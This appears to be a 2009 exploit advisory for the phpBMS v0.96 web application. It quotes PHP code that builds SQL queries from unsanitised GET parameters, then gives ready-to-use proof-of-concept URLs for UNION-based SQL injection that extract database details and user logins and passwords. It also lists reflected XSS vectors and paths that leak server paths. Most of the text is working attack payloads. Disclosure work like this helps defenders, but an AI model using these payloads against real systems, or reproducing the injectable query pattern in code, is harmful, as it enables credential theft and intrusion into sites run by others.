phpBMS v0.96 phpbms.org eLwaux(c)2009, uasc.org.ua http://phpbms.org/trial/ ## ## ## SQL Inj ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $querystatement="SELECT if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value) AS value FROM discounts WHERE id=".$_GET["id"]; $queryresult = $db->query($querystatement); ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()) ## ## ## SQL Inj \dbgraphic.php ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM ".$_GET["t"]." WHERE id=".$_GET["r"]; $queryresult=$db->query($querystatement); ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1 ## ## ## SQL Inj ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- if(isset($_GET["cmd"])){ switch($_GET["cmd"]){ case "show": showSearch($_GET["tid"],$_GET["base"],$db); break; }//end switch ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PoC: /advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2 /advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2 ## ## ## pXSS -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
"> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PoC: \index.php/">
{XSS} \phpbms\modules\base\adminsettings.php\">{XSS} ## ## ## Path Disclosure /footer.php /header.php /advancedsearch.php?cmd=show& /choicelist.php # milw0rm.com [2009-07-10]